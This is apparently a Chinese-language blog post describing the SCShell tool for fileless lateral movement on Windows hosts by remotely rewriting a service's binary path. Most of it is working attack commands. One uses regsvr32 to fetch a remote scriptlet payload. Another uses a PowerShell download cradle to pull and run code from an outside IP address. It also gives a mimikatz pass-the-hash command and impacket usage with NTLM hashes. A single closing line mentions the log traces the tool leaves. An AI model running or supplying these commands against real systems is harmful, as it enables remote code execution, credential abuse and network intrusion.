橫向無檔案移動--SCshell使用

hu1ge(micr067)發表於2020-12-12

1、簡介

SCShell是無檔案橫向移動工具,它依賴ChangeServiceConfigA來執行命令。該工具的優點在於它不會針對SMB執行身份驗證。一切都通過DCERPC執行。無需建立服務,而只需通過ChangeServiceConfigAAPI 遠端開啟服務並修改二進位制路徑名即可(所以要事先知道目標上的服務名稱)。支援py和exe兩種檔案型別。

2、使用

Windows 使用

    SCShell.exe target service payload domain username password
    SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服務名

測試寫入檔案

scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\hello.txt" . administrator admin@123


CSshell橫向利用powershell上線

scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://182.1.1.156:8000/a')" . administrator admin@123

可以使用該C程式傳遞雜湊值。
有時情況下,將使用當前程式令牌。您可以使用標準傳遞雜湊方法設定當前流程令牌。

在本地系統上

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe

然後在新建立的cmd.exe中執行SCShell.exe進行橫向。
上面我們使用的是XblAuthManager,其實我們還可以使用defragsvc,msbuild等等

2. Linux 安裝使用

    pip install impacket
    git clone https://github.com/Mr-Un1k0d3r/SCShell
    cd https://github.com/Mr-Un1k0d3r/SCShell
    python scshell.py ./administrator:cxzcxz@192.168.52.133 # 執行cmd模式,沒有命令回顯
    python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash驗證

3、日誌痕跡

使用使用者憑證連線會在目標日誌系統留下使用者名稱、來訪機器IP和服務超時等資訊

相關文章